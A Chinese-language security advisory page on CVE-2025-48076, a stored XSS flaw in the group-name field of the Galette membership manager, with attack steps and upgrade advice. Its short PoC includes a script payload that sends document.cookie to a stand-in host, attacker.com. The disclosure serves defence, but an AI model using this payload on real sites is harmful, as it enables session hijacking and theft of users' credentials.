IPBUF安全漏洞报告
English
CVE-2025-48076 CVSS 5.4 中危

CVE-2025-48076: Galette群组名称存储型XSS漏洞

披露日期: 2025-11-04

漏洞信息

漏洞编号
CVE-2025-48076
漏洞类型
XSS (跨站脚本攻击)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Galette

相关标签

CVE-2025-48076XSS存储型XSSGalette会员管理系统Web应用漏洞中危漏洞

漏洞概述

Galette是一款面向非营利组织的会员管理Web应用程序。在1.1.5.2及以下版本中存在一处存储型跨站脚本(XSS)漏洞,攻击者可以在编辑群组名称时注入恶意XSS payload。当其他用户访问或管理该群组时,恶意脚本将在其浏览器上下文中执行,可能导致会话劫持、敏感信息窃取或对其他用户进行进一步攻击。该漏洞被分类为中等严重程度,CVSS评分为5.4,需要低权限用户交互才能触发。Galette开发团队已在1.2.0版本中修复此问题,强烈建议用户尽快升级。

技术细节

该漏洞为存储型XSS(Stored XSS),存在于Galette的群组管理功能中。攻击流程如下:1) 攻击者以低权限用户身份登录系统;2) 访问群组编辑功能;3) 在群组名称字段中注入恶意JavaScript代码,如<script>alert(document.cookie)</script>;4) 保存修改后,恶意payload存储在数据库中;5) 当其他用户或管理员浏览群组列表或相关页面时,恶意脚本在受害者浏览器中执行。由于是存储型XSS,攻击代码会持久存在于系统中,影响所有访问该内容的用户。漏洞根因在于应用程序未对用户输入进行充分的输出编码和过滤。

攻击链分析

STEP 1
步骤1: 侦察与登录
攻击者获取Galette系统访问权限,使用低权限账号登录系统
STEP 2
步骤2: 漏洞利用
攻击者访问群组编辑功能,在群组名称字段中注入恶意XSS payload
STEP 3
步骤3: Payload存储
恶意脚本随群组信息保存到数据库,形成持久化攻击向量
STEP 4
步骤4: 触发攻击
其他用户或管理员访问群组列表页面时,恶意脚本在其浏览器中自动执行
STEP 5
步骤5: 攻击成功
攻击者通过XSS成功窃取用户会话Cookie、敏感信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-48076 PoC - Stored XSS in Galette Group Name // Target: Galette <= 1.1.5.2 // Step 1: Login to Galette with low privilege account // POST /galette/login const loginData = { login: 'attacker_user', password: 'password123' }; // Step 2: Navigate to group edit page and inject XSS payload // GET /galette/groups/edit?id=1 // In the group name field, enter: const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Step 3: Submit the form // POST /galette/groups/edit const groupData = { group_name: xssPayload, group_desc: 'Malicious group' }; // When other users visit group listing page, the XSS will execute // GET /galette/groups // Payload triggers and sends cookies to attacker server

影响范围

Galette <= 1.1.5.2

防御指南

临时缓解措施
立即升级Galette至1.2.0版本以修复此存储型XSS漏洞。在无法立即升级的情况下,可临时禁用群组管理功能或限制低权限用户创建/编辑群组的权限,同时在Web应用防火墙(WAF)上配置XSS防护规则对相关参数进行过滤。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表